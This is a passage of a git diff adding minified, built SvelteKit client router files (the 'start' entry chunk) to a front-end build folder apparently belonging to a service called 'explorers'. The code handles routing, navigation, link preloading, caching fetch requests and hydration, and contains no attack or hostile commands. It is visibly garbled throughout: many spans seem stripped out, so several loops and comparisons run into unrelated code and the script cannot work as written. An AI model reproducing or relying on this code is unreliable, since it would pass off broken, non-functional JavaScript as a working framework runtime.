pe({id:e,invalidating:s,url:n,params:o,route:a}){if((g==null?void 0:g.id)===e)return g.promise;const{errors:c,layouts:p,leaf:v}=a,b=[...p,v];c.forEach(S=>S==null?void 0:S().catch(()=>{})),b.forEach(S=>S==null?void 0:S[1]().catch(()=>{}));let y=null;const L=d.url?e!==d.url.pathname+d.url.search:!1,A=d.route?a.id!==d.route.id:!1;let P=!1;const _=b.map((S,I)=>{var B;const k=d.branch[I],$=!!(S!=null&&S[0])&&((k==null?void 0:k.loader)!==S[1]||Oe(P,A,L,(B=k.server)==null?void 0:B.uses,o));return $&&(P=!0),$});if(_.some(Boolean)){try{y=await He(n,_)}catch(S){return ie({status:S instanceof ne?S.status:500,error:await Q(S,{url:n,params:o,route:{id:a.id}}),url:n,route:a})}if(y.type==="redirect")return y}const w=y==null?void 0:y.nodes;let O=!1;const N=b.map(async(S,I)=>{var he;if(!S)return;const k=d.branch[I],$=w==null?void 0:w[I];if((!$||$.type==="skip")&&S[1]===(k==null?void 0:k.loader)&&!Oe(O,A,L,(he=k.universal)==null?void 0:he.uses,o))return k;if(O=!0,($==null?void 0:$.type)==="error")throw $;return ue({loader:S[1],url:n,params:o,route:a,parent:async()=>{var Te;const $e={};for(let ge=0;ge{});const M=[];for(let S=0;SPromise.resolve({}),server_data_node:de(c)}),b={node:await h(),loader:h,universal:null,server:null,data:null};return await X({url:n,params:a,branch:[v,b],status:e,error:s,route:null})}function Z(e,s){if(ye(e,G))return;const n=se(e);for(const o of f){const a=o.exec(n);if(a)return{id:e.pathname+e.search,invalidating:s,route:o,params:tt(a),url:e}}}function se(e){return et(e.pathname.slice(G.length)||"/")}function Ue({url:e,type:s,intent:n,delta:o}){let a=!1;const c=Be(d,n,e,s);o!==void 0&&(c.navigation.delta=o);const p={...c.navigation,cancel:()=>{a=!0,c.reject(new Error("navigation was cancelled"))}};return U||m.before_navigate.forEach(v=>v(p)),a?null:c}async function ce({url:e,scroll:s,keepfocus:n,redirect_count:o,details:a,type:c,delta:p,nav_token:v={},accepted:b,blocked:y}){var N,M,S;const L=Z(e,!1),A=Ue({url:e,type:c,delta:p,intent:L});if(!A){y();return}const P=x;b(),U=!0,T&&H.navigating.set(A.navigation),W=v;let _=L&&await pe(L);if(!_){if(ye(e,G))return await K(e);_=await je(e,{id:null},await Q(new Error(`Not found: ${e.pathname}`),{url:e,params:{},route:{id:null}}),404)}if(e=(L==null?void 0:L.url)||e,W!==v)return A.reject(new Error("navigation was aborted")),!1;if(_.type==="redirect")if(o>=20)_=await ie({status:500,error:await Q(new Error("Redirect loop"),{url:e,params:{},route:{id:null}}),url:e,route:{id:null}});else return re(new URL(_.location,e).href,{},o+1,v),!1;else((N=_.props.page)==null?void 0:N.status)>=400&&await H.updated.check()&&await K(e);if(E.length=0,z=!1,C=!0,be(P),Re(P),(M=_.props.page)!=null&&M.url&&_.props.page.url.pathname!==e.pathname&&(e.pathname=(S=_.props.page)==null?void 0:S.url.pathname),a){const I=a.replaceState?0:1;if(a.state[V]=x+=I,history[a.replaceState?"replaceState":"pushState"](a.state,"",e),!a.replaceState){let k=x+1;for(;ee[k]||J[k];)delete ee[k],delete J[k],k+=1}}if(g=null,T){d=_.state,_.props.page&&(_.props.page.url=e);const I=(await Promise.all(m.on_navigate.map(k=>k(A.navigation)))).filter(k=>typeof k=="function");if(I.length>0){let k=function(){m.after_navigate=m.after_navigate.filter($=>!I.includes($))};I.push(k),m.after_navigate.push(...I)}q.$set(_.props)}else Pe(_);const{activeElement:w}=document;if(await we(),R){const I=e.hash&&document.getElementById(decodeURIComponent(e.hash.slice(1)));s?scrollTo(s.x,s.y):I?I.scrollIntoView():scrollTo(0,0)}const O=document.activeElement!==w&&document.activeElement!==document.body;!n&&!O&&Ee(),R=!0,_.props.page&&(F=_.props.page),U=!1,c==="popstate"&&Ae(x),A.fulfil(void 0),m.after_navigate.forEach(I=>I(A.navigation)),H.navigating.set(null),C=!1}async function je(e,s,n,o){return e.origin===Me&&e.pathname===location.pathname&&!j?await ie({status:o,error:n,url:e,route:s}):await K(e)}function Xe(){let e;u.addEventListener("mousemove",c=>{const p=c.target;clearTimeout(e),e=setTimeout(()=>{o(p,2)},20)});function s(c){o(c.composedPath()[0],1)}u.addEventListener("mousedown",s),u.addEventListener("touchstart",s,{passive:!0});const n=new IntersectionObserver(c=>{for(const p of c)p.isIntersecting&&(oe(se(new URL(p.target.href))),n.unobserve(p.target))},{threshold:0});function o(c,p){const v=Ce(c,u);if(!v)return;const{url:b,external:y,download:L}=_e(v,G);if(y||L)return;const A=le(v);if(!A.reload)if(p<=A.preload_data){const P=Z(b,!1);P&&Le(P)}else p<=A.preload_code&&oe(se(b))}function a(){n.disconnect();for(const c of u.querySelectorAll("a")){const{url:p,external:v,download:b}=_e(c,G);if(v||b)continue;const y=le(c);y.reload||(y.preload_code===Ve.viewport&&n.observe(c),y.preload_code===Ve.eager&&oe(se(p)))}}m.after_navigate.push(a),a()}function Q(e,s){return e instanceof ne?e.body:t.hooks.handleError({error:e,event:s})??{message:s.route.id!=null?"Internal Error":"Not Found"}}return{after_navigate:e=>{me(()=>(m.after_navigate.push(e),()=>{const s=m.after_navigate.indexOf(e);m.after_navigate.splice(s,1)}))},before_navigate:e=>{me(()=>(m.before_navigate.push(e),()=>{const s=m.before_navigate.indexOf(e);m.before_navigate.splice(s,1)}))},on_navigate:e=>{me(()=>(m.on_navigate.push(e),()=>{const s=m.on_navigate.indexOf(e);m.on_navigate.splice(s,1)}))},disable_scroll_handling:()=>{(C||!T)&&(R=!1)},goto:(e,s={})=>re(e,s,0),invalidate:e=>{if(typeof e=="function")E.push(e);else{const{href:s}=new URL(e,location.href);E.push(n=>n.href===s)}return ke()},invalidate_all:()=>(z=!0,ke()),preload_data:async e=>{const s=new URL(e,De(document)),n=Z(s,!1);if(!n)throw new Error(`Attempted to preload a URL that does not belong to this app: ${s}`);await Le(n)},preload_code:oe,apply_action:async e=>{if(e.type==="error"){const s=new URL(location.href),{branch:n,route:o}=d;if(!o)return;const a=await xe(d.branch.length,n,o.errors);if(a){const c=await X({url:s,params:d.params,branch:n.slice(0,a.idx).concat(a.node),status:e.status??500,error:e.error,route:o});d=c.state,q.$set(c.props),we().then(Ee)}}else e.type==="redirect"?re(e.location,{invalidateAll:!0},0):(q.$set({form:null,page:{...F,form:e.data,status:e.status}}),await we(),q.$set({form:e.data}),e.type==="success"&&Ee())},_start_router:()=>{var s;history.scrollRestoration="manual",addEventListener("beforeunload",n=>{let o=!1;if(Ie(),!U){const a=Be(d,void 0,null,"leave"),c={...a.navigation,cancel:()=>{o=!0,a.reject(new Error("navigation was cancelled"))}};m.before_navigate.forEach(p=>p(c))}o?(n.preventDefault(),n.returnValue=""):history.scrollRestoration="auto"}),addEventListener("visibilitychange",()=>{document.visibilityState==="hidden"&&Ie()}),(s=navigator.connection)!=null&&s.saveData||Xe(),u.addEventListener("click",n=>{var P;if(n.button||n.which!==1||n.metaKey||n.ctrlKey||n.shiftKey||n.altKey||n.defaultPrevented)return;const o=Ce(n.composedPath()[0],u);if(!o)return;const{url:a,external:c,target:p,download:v}=_e(o,G);if(!a)return;if(p==="_parent"||p==="_top"){if(window.parent!==window)return}else if(p&&p!=="_self")return;const b=le(o);if(!(o instanceof SVGAElement)&&a.protocol!==location.protocol&&!(a.protocol==="https:"||a.protocol==="http:")||v)return;if(c||b.reload){Ue({url:a,type:"link"})?U=!0:n.preventDefault();return}const[L,A]=a.href.split("#");if(A!==void 0&&L===location.href.split("#")[0]){if(d.url.hash===a.hash){n.preventDefault(),(P=o.ownerDocument.getElementById(A))==null||P.scrollIntoView();return}if(D=!0,be(x),e(a),!b.replace_state)return;D=!1,n.preventDefault()}ce({url:a,scroll:b.noscroll?te():null,keepfocus:b.keep_focus??!1,redirect_count:0,details:{state:{},replaceState:b.replace_state??a.href===location.href},accepted:()=>n.preventDefault(),blocked:()=>n.preventDefault(),type:"link"})}),u.addEventListener("submit",n=>{if(n.defaultPrevented)return;const o=HTMLFormElement.prototype.cloneNode.call(n.target),a=n.submitter;if(((a==null?void 0:a.formMethod)||o.method)!=="get")return;const p=new URL((a==null?void 0:a.hasAttribute("formaction"))&&(a==null?void 0:a.formAction)||o.action);if(ye(p,G))return;const v=n.target,{keep_focus:b,noscroll:y,reload:L,replace_state:A}=le(v);if(L)return;n.preventDefault(),n.stopPropagation();const P=new FormData(v),_=a==null?void 0:a.getAttribute("name");_&&P.append(_,(a==null?void 0:a.getAttribute("value"))??""),p.search=new URLSearchParams(P).toString(),ce({url:p,scroll:y?te():null,keepfocus:b??!1,redirect_count:0,details:{state:{},replaceState:A??p.href===location.href},nav_token:{},accepted:()=>{},blocked:()=>{},type:"form"})}),addEventListener("popstate",async n=>{var o;if(W={},(o=n.state)!=null&&o[V]){if(n.state[V]===x)return;const a=J[n.state[V]],c=new URL(location.href);if(d.url.href.split("#")[0]===location.href.split("#")[0]){e(c),J[x]=te(),x=n.state[V],scrollTo(a.x,a.y);return}const p=n.state[V]-x;await ce({url:c,scroll:a,keepfocus:!1,redirect_count:0,details:null,accepted:()=>{x=n.state[V]},blocked:()=>{history.go(-p)},type:"popstate",delta:p,nav_token:W})}else if(!D){const a=new URL(location.href);e(a)}}),addEventListener("hashchange",()=>{D&&(D=!1,history.replaceState({...history.state,[V]:++x},"",location.href))});for(const n of document.querySelectorAll("link"))n.rel==="icon"&&(n.href=n.href);addEventListener("pageshow",n=>{n.persisted&&H.navigating.set(null)});function e(n){d.url=n,H.page.set({...F,url:n}),H.page.notify()}},_hydrate:async({status:e=200,error:s,node_ids:n,params:o,route:a,data:c,form:p})=>{j=!0;const v=new URL(location.href);({params:o={},route:a={id:null}}=Z(v,!1)||{});let b;try{const y=n.map(async(P,_)=>{const w=c[_];return w!=null&&w.uses&&(w.uses=Ye(w.uses)),ue({loader:t.nodes[P],url:v,params:o,route:a,parent:async()=>{const O={};for(let N=0;N<_;N+=1)Object.assign(O,(await y[N]).data);return O},server_data_node:de(w)})}),L=await Promise.all(y),A=f.find(({id:P})=>P===a.id);if(A){const P=A.layouts;for(let _=0;_u?"1":"0").join(""));const i=await Ke(f.href);if((h=i.headers.get("content-type"))!=null&&h.includes("text/html")&&await K(t),!i.ok)throw new ne(i.status,await i.json());return new Promise(async u=>{var j;const E=new Map,l=i.body.getReader(),g=new TextDecoder;function m(T){return Et(T,{Promise:R=>new Promise((C,U)=>{E.set(R,{fulfil:C,reject:U})})})}let d="";for(;;){const{done:T,value:R}=await l.read();if(T&&!d)break;for(d+=!R&&d?` +`:g.decode(R);;){const C=d.indexOf(` +`);if(C===-1)break;const U=JSON.parse(d.slice(0,C));if(d=d.slice(C+1),U.type==="redirect")return u(U);if(U.type==="data")(j=U.nodes)==null||j.forEach(D=>{(D==null?void 0:D.type)==="data"&&(D.uses=Ye(D.uses),D.data=m(D.data))}),u(U);else if(U.type==="chunk"){const{id:D,data:z,error:q}=U,x=E.get(D);E.delete(D),q?x.reject(m(q)):x.fulfil(m(z))}}}})}function Ye(t){return{dependencies:new Set((t==null?void 0:t.dependencies)??[]),params:new Set((t==null?void 0:t.params)??[]),parent:!!(t!=null&&t.parent),route:!!(t!=null&&t.route),url:!!(t!=null&&t.url)}}function Ee(){const t=document.querySelector("[autofocus]");if(t)t.focus();else{const r=document.body,f=r.getAttribute("tabindex");r.tabIndex=-1,r.focus({preventScroll:!0,focusVisible:!1}),f!==null?r.setAttribute("tabindex",f):r.removeAttribute("tabindex");const i=getSelection();if(i&&i.type!=="None"){const h=[];for(let u=0;u{if(i.rangeCount===h.length){for(let u=0;u{h=d,u=j});return E.catch(()=>{}),{navigation:{from:{params:t.params,route:{id:((g=t.route)==null?void 0:g.id)??null},url:t.url},to:f&&{params:(r==null?void 0:r.params)??null,route:{id:((m=r==null?void 0:r.route)==null?void 0:m.id)??null},url:f},willUnload:!r,type:i,complete:E},fulfil:h,reject:u}}async function xt(t,r,f){const i=Lt(t,r);Ze({client:i}),f?await i._hydrate(f):i.goto(location.href,{replaceState:!0}),i._start_router()}export{xt as start}; diff --git a/services/explorers/front/build/_app/immutable/entry/start.deee71d0.js b/services/explorers/front/build/_app/immutable/entry/start.deee71d0.js new file mode 100644 index 0000000..53f87e9 --- /dev/null +++ b/services/explorers/front/build/_app/immutable/entry/start.deee71d0.js @@ -0,0 +1,3 @@ +import{o as me,t as we}from"../chunks/scheduler.1f572272.js";import{S as Ge,a as Je,I as V,g as De,f as Ce,b as _e,c as le,s as te,i as ye,d as H,o as Me,e as G,P as Ve,h as Ze}from"../chunks/singletons.27fcd387.js";function Qe(t,r){return t==="/"||r==="ignore"?t:r==="never"?t.endsWith("/")?t.slice(0,-1):t:r==="always"&&!t.endsWith("/")?t+"/":t}function et(t){return t.split("%25").map(decodeURI).join("%25")}function tt(t){for(const r in t)t[r]=decodeURIComponent(t[r]);return t}const nt=["href","pathname","search","searchParams","toString","toJSON"];function at(t,r){const f=new URL(t);for(const i of nt)Object.defineProperty(f,i,{get(){return r(),t[i]},enumerable:!0,configurable:!0});return rt(f),f}function rt(t){Object.defineProperty(t,"hash",{get(){throw new Error("Cannot access event.url.hash. Consider using `$page.url.hash` inside a component instead")}})}const ot="/__data.json";function it(t){return t.replace(/\/$/,"")+ot}function st(...t){let r=5381;for(const f of t)if(typeof f=="string"){let i=f.length;for(;i;)r=r*33^f.charCodeAt(--i)}else if(ArrayBuffer.isView(f)){const i=new Uint8Array(f.buffer,f.byteOffset,f.byteLength);let h=i.length;for(;h;)r=r*33^i[--h]}else throw new TypeError("value must be a string or TypedArray");return(r>>>0).toString(36)}const Ke=window.fetch;window.fetch=(t,r)=>((t instanceof Request?t.method:(r==null?void 0:r.method)||"GET")!=="GET"&&ae.delete(Se(t)),Ke(t,r));const ae=new Map;function ct(t,r){const f=Se(t,r),i=document.querySelector(f);if(i!=null&&i.textContent){const{body:h,...u}=JSON.parse(i.textContent),E=i.getAttribute("data-ttl");return E&&ae.set(f,{body:h,init:u,ttl:1e3*Number(E)}),Promise.resolve(new Response(h,u))}return window.fetch(t,r)}function lt(t,r,f){if(ae.size>0){const i=Se(t,f),h=ae.get(i);if(h){if(performance.now(){const h=/^\[\.\.\.(\w+)(?:=(\w+))?\]$/.exec(i);if(h)return r.push({name:h[1],matcher:h[2],optional:!1,rest:!0,chained:!0}),"(?:/(.*))?";const u=/^\[\[(\w+)(?:=(\w+))?\]\]$/.exec(i);if(u)return r.push({name:u[1],matcher:u[2],optional:!0,rest:!1,chained:!0}),"(?:/([^/]+))?";if(!i)return;const E=i.split(/\[(.+?)\](?!\])/);return"/"+E.map((g,m)=>{if(m%2){if(g.startsWith("x+"))return ve(String.fromCharCode(parseInt(g.slice(2),16)));if(g.startsWith("u+"))return ve(String.fromCharCode(...g.slice(2).split("-").map(U=>parseInt(U,16))));const d=ft.exec(g);if(!d)throw new Error(`Invalid param: ${g}. Params and matcher names can only have underscores and alphanumeric characters.`);const[,j,T,R,C]=d;return r.push({name:R,matcher:C,optional:!!j,rest:!!T,chained:T?m===1&&E[0]==="":!1}),T?"(.*?)":j?"([^/]*)?":"([^/]+?)"}return ve(g)}).join("")}).join("")}/?$`),params:r}}function dt(t){return!/^\([^)]+\)$/.test(t)}function pt(t){return t.slice(1).split("/").filter(dt)}function ht(t,r,f){const i={},h=t.slice(1),u=h.filter(l=>l!==void 0);let E=0;for(let l=0;ld).join("/"),E=0),m===void 0){g.rest&&(i[g.name]="");continue}if(!g.matcher||f[g.matcher](m)){i[g.name]=m;const d=r[l+1],j=h[l+1];d&&!d.rest&&d.optional&&j&&g.chained&&(E=0),!d&&!j&&Object.keys(i).length===u.length&&(E=0);continue}if(g.optional&&g.chained){E++;continue}return}if(!E)return i}function ve(t){return t.normalize().replace(/[[\]]/g,"\\$&").replace(/%/g,"%25").replace(/\//g,"%2[Ff]").replace(/\?/g,"%3[Ff]").replace(/#/g,"%23").replace(/[.*+?^${}()|\\]/g,"\\$&")}function gt({nodes:t,server_loads:r,dictionary:f,matchers:i}){const h=new Set(r);return Object.entries(f).map(([l,[g,m,d]])=>{const{pattern:j,params:T}=ut(l),R={id:l,exec:C=>{const U=j.exec(C);if(U)return ht(U,T,i)},errors:[1,...d||[]].map(C=>t[C]),layouts:[0,...m||[]].map(E),leaf:u(g)};return R.errors.length=R.layouts.length=Math.max(R.errors.length,R.layouts.length),R});function u(l){const g=l<0;return g&&(l=~l),[g,t[l]]}function E(l){return l===void 0?l:[h.has(l),t[l]]}}function ze(t){try{return JSON.parse(sessionStorage[t])}catch{}}function qe(t,r){const f=JSON.stringify(r);try{sessionStorage[t]=f}catch{}}const mt=-1,wt=-2,_t=-3,yt=-4,vt=-5,bt=-6;function Et(t,r){if(typeof t=="number")return h(t,!0);if(!Array.isArray(t)||t.length===0)throw new Error("Invalid input");const f=t,i=Array(f.length);function h(u,E=!1){if(u===mt)return;if(u===_t)return NaN;if(u===yt)return 1/0;if(u===vt)return-1/0;if(u===bt)return-0;if(E)throw new Error("Invalid input");if(u in i)return i[u];const l=f[u];if(!l||typeof l!="object")i[u]=l;else if(Array.isArray(l))if(typeof l[0]=="string"){const g=l[0],m=r==null?void 0:r[g];if(m)return i[u]=m(h(l[1]));switch(g){case"Date":i[u]=new Date(l[1]);break;case"Set":const d=new Set;i[u]=d;for(let R=1;Rr!=null)}const We=new Set(["load","prerender","csr","ssr","trailingSlash","config"]);[...We];const kt=new Set([...We]);[...kt];async function Rt(t){var r;for(const f in t)if(typeof((r=t[f])==null?void 0:r.then)=="function")return Object.fromEntries(await Promise.all(Object.entries(t).map(async([i,h])=>[i,await h])));return t}class ne{constructor(r,f){this.status=r,typeof f=="string"?this.body={message:f}:f?this.body=f:this.body={message:`Error: ${r}`}}toString(){return JSON.stringify(this.body)}}class Fe{constructor(r,f){this.status=r,this.location=f}}const At="x-sveltekit-invalidated",It="x-sveltekit-trailing-slash",J=ze(Ge)??{},ee=ze(Je)??{};function be(t){J[t]=te()}function K(t){return location.href=t.href,new Promise(()=>{})}function Lt(t,r){var Ne;const f=gt(t),i=t.nodes[0],h=t.nodes[1];i(),h();const u=document.documentElement,E=[],l=[];let g=null;const m={before_navigate:[],on_navigate:[],after_navigate:[]};let d={branch:[],error:null,url:null},j=!1,T=!1,R=!0,C=!1,U=!1,D=!1,z=!1,q,x=(Ne=history.state)==null?void 0:Ne[V];x||(x=Date.now(),history.replaceState({...history.state,[V]:x},"",location.href));const fe=J[x];fe&&(history.scrollRestoration="manual",scrollTo(fe.x,fe.y));let F,W,Y;async function ke(){if(Y=Y||Promise.resolve(),await Y,!Y)return;Y=null;const e=new URL(location.href),s=Z(e,!0);g=null;const n=W={},o=s&&await pe(s);if(n===W&&o){if(o.type==="redirect")return re(new URL(o.location,e).href,{},1,n);o.props.page!==void 0&&(F=o.props.page),q.$set(o.props)}}function Re(e){l.some(s=>s==null?void 0:s.snapshot)&&(ee[e]=l.map(s=>{var n;return(n=s==null?void 0:s.snapshot)==null?void 0:n.capture()}))}function Ae(e){var s;(s=ee[e])==null||s.forEach((n,o)=>{var a,c;(c=(a=l[o])==null?void 0:a.snapshot)==null||c.restore(n)})}function Ie(){be(x),qe(Ge,J),Re(x),qe(Je,ee)}async function re(e,{noScroll:s=!1,replaceState:n=!1,keepFocus:o=!1,state:a={},invalidateAll:c=!1},p,v){return typeof e=="string"&&(e=new URL(e,De(document))),ce({url:e,scroll:s?te():null,keepfocus:o,redirect_count:p,details:{state:a,replaceState:n},nav_token:v,accepted:()=>{c&&(z=!0)},blocked:()=>{},type:"goto"})}async function Le(e){return g={id:e.id,promise:pe(e).then(s=>(s.type==="loaded"&&s.state.error&&(g=null),s))},g.promise}async function oe(...e){const n=f.filter(o=>e.some(a=>o.exec(a))).map(o=>Promise.all([...o.layouts,o.leaf].map(a=>a==null?void 0:a[1]())));await Promise.all(n)}function Pe(e){var o;d=e.state;const s=document.querySelector("style[data-sveltekit]");s&&s.remove(),F=e.props.page,q=new t.root({target:r,props:{...e.props,stores:H,components:l},hydrate:!0}),Ae(x);const n={from:null,to:{params:d.params,route:{id:((o=d.route)==null?void 0:o.id)??null},url:new URL(location.href)},willUnload:!1,type:"enter",complete:Promise.resolve()};m.after_navigate.forEach(a=>a(n)),T=!0}async function X({url:e,params:s,branch:n,status:o,error:a,route:c,form:p}){let v="never";for(const _ of n)(_==null?void 0:_.slash)!==void 0&&(v=_.slash);e.pathname=Qe(e.pathname,v),e.search=e.search;const b={type:"loaded",state:{url:e,params:s,branch:n,error:a,route:c},props:{constructors:St(n).map(_=>_.node.component)}};p!==void 0&&(b.props.form=p);let y={},L=!F,A=0;for(let _=0;_(v.route=!0,w[O])}),params:new Proxy(o,{get:(w,O)=>(v.params.add(O),w[O])}),data:(c==null?void 0:c.data)??null,url:at(n,()=>{v.url=!0}),async fetch(w,O){let N;w instanceof Request?(N=w.url,O={body:w.method==="GET"||w.method==="HEAD"?void 0:await w.blob(),cache:w.cache,credentials:w.credentials,headers:w.headers,integrity:w.integrity,keepalive:w.keepalive,method:w.method,mode:w.mode,redirect:w.redirect,referrer:w.referrer,referrerPolicy:w.referrerPolicy,signal:w.signal,...O}):N=w;const M=new URL(N,n);return P(M.href),M.origin===n.origin&&(N=M.href.slice(n.origin.length)),T?lt(N,M.href,O):ct(N,O)},setHeaders:()=>{},depends:P,parent(){return v.parent=!0,s()}};p=await b.universal.load.call(null,_)??null,p=p?await Rt(p):null}return{node:b,loader:e,server:c,universal:(L=b.universal)!=null&&L.load?{type:"data",data:p,uses:v}:null,data:p??(c==null?void 0:c.data)??null,slash:((A=b.universal)==null?void 0:A.trailingSlash)??(c==null?void 0:c.slash)}}function Oe(e,s,n,o,a){if(z)return!0;if(!o)return!1;if(o.parent&&e||o.route&&s||o.url&&n)return!0;for(const c of o.params)if(a[c]!==d.params[c])return!0;for(const c of o.dependencies)if(E.some(p=>p(new URL(c))))return!0;return!1}function de(e,s){return(e==null?void 0:e.type)==="data"?e:(e==null?void 0:e.type)==="skip"?s??null:null}async function pe({id:e,invalidating:s,url:n,params:o,route:a}){if((g==null?void 0:g.id)===e)return g.promise;const{errors:c,layouts:p,leaf:v}=a,b=[...p,v];c.forEach(S=>S==null?void 0:S().catch(()=>{})),b.forEach(S=>S==null?void 0:S[1]().catch(()=>{}));let y=null;const L=d.url?e!==d.url.pathname+d.url.search:!1,A=d.route?a.id!==d.route.id:!1;let P=!1;const _=b.map((S,I)=>{var B;const k=d.branch[I],$=!!(S!=null&&S[0])&&((k==null?void 0:k.loader)!==S[1]||Oe(P,A,L,(B=k.server)==null?void 0:B.uses,o));return $&&(P=!0),$});if(_.some(Boolean)){try{y=await He(n,_)}catch(S){return ie({status:S instanceof ne?S.status:500,error:await Q(S,{url:n,params:o,route:{id:a.id}}),url:n,route:a})}if(y.type==="redirect")return y}const w=y==null?void 0:y.nodes;let O=!1;const N=b.map(async(S,I)=>{var he;if(!S)return;const k=d.branch[I],$=w==null?void 0:w[I];if((!$||$.type==="skip")&&S[1]===(k==null?void 0:k.loader)&&!Oe(O,A,L,(he=k.universal)==null?void 0:he.uses,o))return k;if(O=!0,($==null?void 0:$.type)==="error")throw $;return ue({loader:S[1],url:n,params:o,route:a,parent:async()=>{var Te;const $e={};for(let ge=0;ge{});const M=[];for(let S=0;SPromise.resolve({}),server_data_node:de(c)}),b={node:await h(),loader:h,universal:null,server:null,data:null};return await X({url:n,params:a,branch:[v,b],status:e,error:s,route:null})}function Z(e,s){if(ye(e,G))return;const n=se(e);for(const o of f){const a=o.exec(n);if(a)return{id:e.pathname+e.search,invalidating:s,route:o,params:tt(a),url:e}}}function se(e){return et(e.pathname.slice(G.length)||"/")}function Ue({url:e,type:s,intent:n,delta:o}){let a=!1;const c=Be(d,n,e,s);o!==void 0&&(c.navigation.delta=o);const p={...c.navigation,cancel:()=>{a=!0,c.reject(new Error("navigation was cancelled"))}};return U||m.before_navigate.forEach(v=>v(p)),a?null:c}async function ce({url:e,scroll:s,keepfocus:n,redirect_count:o,details:a,type:c,delta:p,nav_token:v={},accepted:b,blocked:y}){var N,M,S;const L=Z(e,!1),A=Ue({url:e,type:c,delta:p,intent:L});if(!A){y();return}const P=x;b(),U=!0,T&&H.navigating.set(A.navigation),W=v;let _=L&&await pe(L);if(!_){if(ye(e,G))return await K(e);_=await je(e,{id:null},await Q(new Error(`Not found: ${e.pathname}`),{url:e,params:{},route:{id:null}}),404)}if(e=(L==null?void 0:L.url)||e,W!==v)return A.reject(new Error("navigation was aborted")),!1;if(_.type==="redirect")if(o>=20)_=await ie({status:500,error:await Q(new Error("Redirect loop"),{url:e,params:{},route:{id:null}}),url:e,route:{id:null}});else return re(new URL(_.location,e).href,{},o+1,v),!1;else((N=_.props.page)==null?void 0:N.status)>=400&&await H.updated.check()&&await K(e);if(E.length=0,z=!1,C=!0,be(P),Re(P),(M=_.props.page)!=null&&M.url&&_.props.page.url.pathname!==e.pathname&&(e.pathname=(S=_.props.page)==null?void 0:S.url.pathname),a){const I=a.replaceState?0:1;if(a.state[V]=x+=I,history[a.replaceState?"replaceState":"pushState"](a.state,"",e),!a.replaceState){let k=x+1;for(;ee[k]||J[k];)delete ee[k],delete J[k],k+=1}}if(g=null,T){d=_.state,_.props.page&&(_.props.page.url=e);const I=(await Promise.all(m.on_navigate.map(k=>k(A.navigation)))).filter(k=>typeof k=="function");if(I.length>0){let k=function(){m.after_navigate=m.after_navigate.filter($=>!I.includes($))};I.push(k),m.after_navigate.push(...I)}q.$set(_.props)}else Pe(_);const{activeElement:w}=document;if(await we(),R){const I=e.hash&&document.getElementById(decodeURIComponent(e.hash.slice(1)));s?scrollTo(s.x,s.y):I?I.scrollIntoView():scrollTo(0,0)}const O=document.activeElement!==w&&document.activeElement!==document.body;!n&&!O&&Ee(),R=!0,_.props.page&&(F=_.props.page),U=!1,c==="popstate"&&Ae(x),A.fulfil(void 0),m.after_navigate.forEach(I=>I(A.navigation)),H.navigating.set(null),C=!1}async function je(e,s,n,o){return e.origin===Me&&e.pathname===location.pathname&&!j?await ie({status:o,error:n,url:e,route:s}):await K(e)}function Xe(){let e;u.addEventListener("mousemove",c=>{const p=c.target;clearTimeout(e),e=setTimeout(()=>{o(p,2)},20)});function s(c){o(c.composedPath()[0],1)}u.addEventListener("mousedown",s),u.addEventListener("touchstart",s,{passive:!0});const n=new IntersectionObserver(c=>{for(const p of c)p.isIntersecting&&(oe(se(new URL(p.target.href))),n.unobserve(p.target))},{threshold:0});function o(c,p){const v=Ce(c,u);if(!v)return;const{url:b,external:y,download:L}=_e(v,G);if(y||L)return;const A=le(v);if(!A.reload)if(p<=A.preload_data){const P=Z(b,!1);P&&Le(P)}else p<=A.preload_code&&oe(se(b))}function a(){n.disconnect();for(const c of u.querySelectorAll("a")){const{url:p,external:v,download:b}=_e(c,G);if(v||b)continue;const y=le(c);y.reload||(y.preload_code===Ve.viewport&&n.observe(c),y.preload_code===Ve.eager&&oe(se(p)))}}m.after_navigate.push(a),a()}function Q(e,s){return e instanceof ne?e.body:t.hooks.handleError({error:e,event:s})??{message:s.route.id!=null?"Internal Error":"Not Found"}}return{after_navigate:e=>{me(()=>(m.after_navigate.push(e),()=>{const s=m.after_navigate.indexOf(e);m.after_navigate.splice(s,1)}))},before_navigate:e=>{me(()=>(m.before_navigate.push(e),()=>{const s=m.before_navigate.indexOf(e);m.before_navigate.splice(s,1)}))},on_navigate:e=>{me(()=>(m.on_navigate.push(e),()=>{const s=m.on_navigate.indexOf(e);m.on_navigate.splice(s,1)}))},disable_scroll_handling:()=>{(C||!T)&&(R=!1)},goto:(e,s={})=>re(e,s,0),invalidate:e=>{if(typeof e=="function")E.push(e);else{const{href:s}=new URL(e,location.href);E.push(n=>n.href===s)}return ke()},invalidate_all:()=>(z=!0,ke()),preload_data:async e=>{const s=new URL(e,De(document)),n=Z(s,!1);if(!n)throw new Error(`Attempted to preload a URL that does not belong to this app: ${s}`);await Le(n)},preload_code:oe,apply_action:async e=>{if(e.type==="error"){const s=new URL(location.href),{branch:n,route:o}=d;if(!o)return;const a=await xe(d.branch.length,n,o.errors);if(a){const c=await X({url:s,params:d.params,branch:n.slice(0,a.idx).concat(a.node),status:e.status??500,error:e.error,route:o});d=c.state,q.$set(c.props),we().then(Ee)}}else e.type==="redirect"?re(e.location,{invalidateAll:!0},0):(q.$set({form:null,page:{...F,form:e.data,status:e.status}}),await we(),q.$set({form:e.data}),e.type==="success"&&Ee())},_start_router:()=>{var s;history.scrollRestoration="manual",addEventListener("beforeunload",n=>{let o=!1;if(Ie(),!U){const a=Be(d,void 0,null,"leave"),c={...a.navigation,cancel:()=>{o=!0,a.reject(new Error("navigation was cancelled"))}};m.before_navigate.forEach(p=>p(c))}o?(n.preventDefault(),n.returnValue=""):history.scrollRestoration="auto"}),addEventListener("visibilitychange",()=>{document.visibilityState==="hidden"&&Ie()}),(s=navigator.connection)!=null&&s.saveData||Xe(),u.addEventListener("click",n=>{var P;if(n.button||n.which!==1||n.metaKey||n.ctrlKey||n.shiftKey||n.altKey||n.defaultPrevented)return;const o=Ce(n.composedPath()[0],u);if(!o)return;const{url:a,external:c,target:p,download:v}=_e(o,G);if(!a)return;if(p==="_parent"||p==="_top"){if(window.parent!==window)return}else if(p&&p!=="_self")return;const b=le(o);if(!(o instanceof SVGAElement)&&a.protocol!==location.protocol&&!(a.protocol==="https:"||a.protocol==="http:")||v)return;if(c||b.reload){Ue({url:a,type:"link"})?U=!0:n.preventDefault();return}const[L,A]=a.href.split("#");if(A!==void 